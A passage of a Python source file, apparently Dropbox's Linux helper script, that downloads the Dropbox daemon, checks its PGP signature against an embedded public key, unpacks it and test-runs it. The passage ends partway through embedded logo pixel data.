DROPBOX_DIST_PATH = "%s/.dropbox-dist" % PARENT_DIR
DROPBOXD_PATH = os.path.join(DROPBOX_DIST_PATH, "dropboxd")
DESKTOP_FILE = "/usr/share/applications/dropbox.desktop"
enc = locale.getpreferredencoding()
# Available from https://linux.dropbox.com/fedora/rpm-public-key.asc
DROPBOX_PUBLIC_KEY = b"""
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.0
mQENBEt0ibEBCACv4hZRPqwtpU6z8+BB5YZU1a3yjEvg2W68+a6hEwxtCa2U++4dzQ+7EqaU
q5ybQnwtbDdpFpsOi9x31J+PCpufPUfIG694/0rlEpmzl2GWzY8NqfdBFGGm/SPSSwvKbeNc
FMRLu5neo7W9kwvfMbGjHmvUbzBUVpCVKD0OEEf1q/Ii0Qcekx9CMoLvWq7ZwNHEbNnij7ec
nvwNlE2MxNsOSJj+hwZGK+tM19kuYGSKw4b5mR8IyThlgiSLIfpSBh1n2KX+TDdk9GR+57TY
vlRu6nTPu98P05IlrrCP+KF0hYZYOaMvQs9Rmc09tc/eoQlN0kkaBWw9Rv/dvLVc0aUXABEB
AAG0MURyb3Bib3ggQXV0b21hdGljIFNpZ25pbmcgS2V5IDxsaW51eEBkcm9wYm94LmNvbT6J
ATYEEwECACAFAkt0ibECGwMGCwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRD8kYszUESRLi/z
B/wMscEa15rS+0mIpsORknD7kawKwyda+LHdtZc0hD/73QGFINR2P23UTol/R4nyAFEuYNsF
0C4IAD6y4pL49eZ72IktPrr4H27Q9eXhNZfJhD7BvQMBx75L0F5gSQwuC7GdYNlwSlCD0AAh
Qbi70VBwzeIgITBkMQcJIhLvllYo/AKD7Gv9huy4RLaIoSeofp+2Q0zUHNPl/7zymOqu+5Ox
e1ltuJT/kd/8hU+N5WNxJTSaOK0sF1/wWFM6rWd6XQUP03VyNosAevX5tBo++iD1WY2/lFVU
JkvAvge2WFk3c6tAwZT/tKxspFy4M/tNbDKeyvr685XKJw9ei6GcOGHD
=5rWG
-----END PGP PUBLIC KEY BLOCK-----
"""
def console_print(st="", f=sys.stdout, linebreak=True):
f.write(st)
if linebreak: f.write(os.linesep)
def console_flush(f=sys.stdout):
f.flush()
def yes_no_question(question):
while True:
console_print(question, linebreak=False)
console_print(" [y/n] ", linebreak=False)
console_flush()
text = input()
if text.lower().startswith("y"):
return True
elif text.lower().startswith("n"):
return False
else:
console_print("Sorry, I didn't understand that. Please type yes or no.")
def plat():
if sys.platform.lower().startswith('linux'):
arch = platform.machine()
if (arch[0] == 'i' and
arch[1].isdigit() and
arch[2:4] == '86'):
plat = "x86"
elif arch == 'x86_64':
plat = arch
else:
FatalVisibleError("Platform not supported")
return "lnx.%s" % plat
else:
FatalVisibleError("Platform not supported")
def is_dropbox_running():
pidfile = os.path.expanduser("~/.dropbox/dropbox.pid")
try:
with open(pidfile, "r") as f:
pid = int(f.read())
with open("/proc/%d/cmdline" % pid, "r") as f:
cmdline = f.read().lower()
except:
cmdline = ""
return "dropbox" in cmdline
@contextmanager
def gpg_context(keys):
gpg_conf_contents = b''
_gpghome = tempfile.mkdtemp(prefix='tmp.gpghome')
try:
os.environ['GNUPGHOME'] = _gpghome
fp = open(os.path.join(_gpghome, 'gpg.conf'), 'wb')
fp.write(gpg_conf_contents)
fp.close()
if gpg:
ctx = gpg.Context()
else:
ctx = gpgme.Context()
loaded = []
for key_file in keys:
if gpg:
ctx.op_import(key_file.read())
result = ctx.op_import_result()
key = ctx.get_key(result.imports[0].fpr)
else:
result = ctx.import_(key_file)
key = ctx.get_key(result.imports[0][0])
loaded.append(key)
ctx.signers = loaded
yield ctx
finally:
del os.environ['GNUPGHOME']
shutil.rmtree(_gpghome, ignore_errors=True)
class SignatureVerifyError(Exception):
pass
def verify_signature(key_file, sig_file, plain_file):
with gpg_context([key_file]) as ctx:
if gpg:
ctx.op_verify(sig_file.read(), plain_file.read(), None)
result = ctx.op_verify_result()
return result.signatures[0].status == 0
# gpgme exists
sigs = ctx.verify(sig_file, plain_file, None)
return sigs[0].status == None
def download_file_chunk(url, buf):
opener = urllib.request.build_opener()
opener.addheaders = [('User-Agent', "DropboxLinuxDownloader/2020.03.04")]
with closing(opener.open(url)) as f:
size = int(f.info()['content-length'])
bufsize = int(max(size / 200, 4096))
progress = 0
yield (0, True)
while True:
try:
chunk = f.read(bufsize)
progress += len(chunk)
buf.write(chunk)
yield (float(progress)/size, True)
if progress == size:
break
except OSError as e:
if hasattr(e, 'errno') and e.errno == errno.EAGAIN:
# nothing left to read
yield (float(progress)/size, False)
else:
raise
class DownloadState(object):
def __init__(self):
self.local_file = BytesIO()
def copy_data(self):
return download_file_chunk(DOWNLOAD_LOCATION_FMT % plat(), self.local_file)
def unpack(self):
# download signature
signature = BytesIO()
for _ in download_file_chunk(SIGNATURE_LOCATION_FMT % plat(), signature):
pass
signature.seek(0)
self.local_file.seek(0)
if gpg or gpgme:
if not verify_signature(BytesIO(DROPBOX_PUBLIC_KEY), signature, self.local_file):
raise SignatureVerifyError()
self.local_file.seek(0)
archive = tarfile.open(fileobj=self.local_file, mode='r:gz')
total_members = len(archive.getmembers())
for i, member in enumerate(archive.getmembers()):
filename = os.path.join(PARENT_DIR, member.name)
if os.path.exists(filename) and not os.path.isdir(filename):
os.unlink(filename)
archive.extract(member, PARENT_DIR)
yield member.name, i, total_members
archive.close()
def cancel(self):
if not self.local_file.closed:
self.local_file.close()
def is_dropbox_valid(self):
"""
Validate that Dropbox runs, so we can show an error
message to the user if it doesn't work.
Returns True if Dropbox can run, false otherwise.
"""
f = open("/dev/null", "w")
try:
a = subprocess.Popen([DROPBOXD_PATH, "/testrun", "0"], preexec_fn=os.setsid, cwd=os.path.expanduser("~"),
stderr=sys.stderr, stdout=f, close_fds=True)
except Exception as e:
print(e)
return False
# in seconds
interval = 0.5
wait_for = 30
for _ in range(int(wait_for / interval)):
ret_val = a.poll()
if ret_val is None:
time.sleep(interval)
continue
return ret_val == 0
return False
def load_serialized_images():
global box_logo_pixbuf, window_icon
import gi
gi.require_version('GdkPixbuf', '2.0')
from gi.repository import GdkPixbuf
box_logo_pixbuf = GdkPixbuf.Pixbuf.new_from_data(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xff\x1b\x00c\xff\xad\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb0\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xff\x02\x00d\xffn\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00d\xffp\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf2\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcb\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xcd\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff3\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00f\xff2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00c\xff\x8e\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00b\xff\x91\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00c\xff\x90\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00b\xff\x8f\x00j\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xffN\x00b\xff\xe2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00e\xffQ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\xffP\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00d\xffO\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\xff\x1c\x00b\xff\xae\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb1\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffo\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00c\xffq\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\xff2\x00c\xff\xcc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xce\x00b\xff4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff4\x00b\xff\xcd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xcc\x00d\xff3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x0c\x00b\xff\x8f\x00b\xff\xfc\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xfd\x00b\xff\x91\x00b\xff\r\x00\x00\x00\x00\x00\x00\x00\x00\x00b\xff\r\x00b\xff\x91\x00c\xff\xfd\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xfc\x00c\xff\x90\x00j\xff\x0c\x00\x00\x00\x00\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xe4\x00d\xffR\x00e\xffQ\x00b\xff\xe4\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00c\xff\xe3\x00c\xffP\x00d\xffO\x00c\xff\xe3\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\x00b\xff\xff\